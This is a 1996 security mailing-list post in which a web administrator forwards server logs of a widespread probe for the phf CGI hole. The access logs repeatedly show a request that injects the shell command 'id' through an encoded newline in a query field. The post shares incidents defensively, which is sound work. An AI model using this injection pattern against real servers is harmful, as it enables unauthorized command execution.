From randy@sierra.zyzzyva.com Thu Jul 25 02:48:27 1996 Received: from sierra.zyzzyva.com (ppp0.zyzzyva.com [198.183.2.50]) by suburbia.net (8.7.4/Proff-950810) with ESMTP id CAA22455 for ; Thu, 25 Jul 1996 02:48:19 +1000 Received: from sierra.zyzzyva.com (localhost [127.0.0.1]) by sierra.zyzzyva.com (8.7.5/8.7.3) with ESMTP id LAA11168 for ; Wed, 24 Jul 1996 11:47:05 -0500 (CDT) Message-Id: <199607241647.LAA11168@sierra.zyzzyva.com> To: best-of-security@suburbia.net Subject: Agressive Web Vulnerability Probe X-uri: http://www.zyzzyva.com/ Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 24 Jul 1996 11:47:04 -0500 From: Randy Terbush I'm forwarding the following log info for a recent probe on some of our web servers. From conversations with other web admins across the country, this probe has been extremely far reaching. Attempts to contact the source of the probe have been unsuccessful. The hole that this probe is looking for has long since been announced. Bear in mind that the attacker could be spoofing this address, however I would think that it would change addresses occasionally if that was the case. All probes across the country have originated from this same address. First the accesses: sentry.wood.com - - [14/Jul/1996:22:43:17 -0500] "GET /cgi-bin/phf?Qalias=foo%0a id" 404 419 sentry.wood.com - - [15/Jul/1996:00:26:34 -0500] "GET /cgi-bin/phf?Qalias=foo%0a id" 404 419 sentry.wood.com - - [15/Jul/1996:10:25:47 -0500] "GET /cgi-bin/phf?Qalias=foo%0a id" 404 419 sentry.wood.com - - [15/Jul/1996:03:18:35 -0500] "GET /cgi-bin/phf?Qalias=foo%0a id" 404 419 sentry.wood.com - - [15/Jul/1996:07:42:14 -0500] "GET /cgi-bin/phf?Qalias=foo%0a id" 404 419 And the errors: [Mon Jul 15 05:54:09 1996] access to /docroot/global/groundwater.org/cgi-bin fai led for sentry.wood.com, reason: File does not exist [Mon Jul 15 02:02:55 1996] access to /docroot/global/infotravel.com/cgi-bin/phf failed for 204.253.173.9, reason: File does not exist [Mon Jul 15 04:58:18 1996] access to /docroot/global/innovativ.com/cgi-bin faile d for sentry.wood.com, reason: File does not exist [Mon Jul 15 05:04:38 1996] access to /docroot/global/ncite.org/cgi-bin failed fo r sentry.wood.com, reason: File does not exist [Mon Jul 15 02:34:43 1996] access to /docroot/global/remax-central.com/cgi-bin f ailed for sentry.wood.com, reason: File does not exist [Mon Jul 15 04:07:04 1996] access to /docroot/global/sportdoc.com/cgi-bin failed for sentry.wood.com, reason: File does not exist